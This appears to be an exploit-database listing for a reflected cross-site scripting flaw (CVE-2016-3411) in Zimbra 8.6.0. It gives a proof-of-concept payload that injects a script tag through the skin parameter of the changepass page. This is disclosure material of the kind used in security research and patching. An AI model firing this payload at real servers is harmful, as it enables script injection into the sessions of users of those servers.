Lucene search

K
zdtDino Barlattani1337DAY-ID-30864
HistoryAug 11, 2018 - 12:00 a.m.

Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability

2018-08-1100:00:00
Dino Barlattani
0day.today
76

0.005 Low

EPSS

Percentile

73.6%

Exploit for php platform in category web applications

# Exploit Title: Xss Zimbra Mail server
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/
 
# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411
 
 
Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>

#  0day.today [2018-08-12]  #

0.005 Low

EPSS

Percentile

73.6%

Related for 1337DAY-ID-30864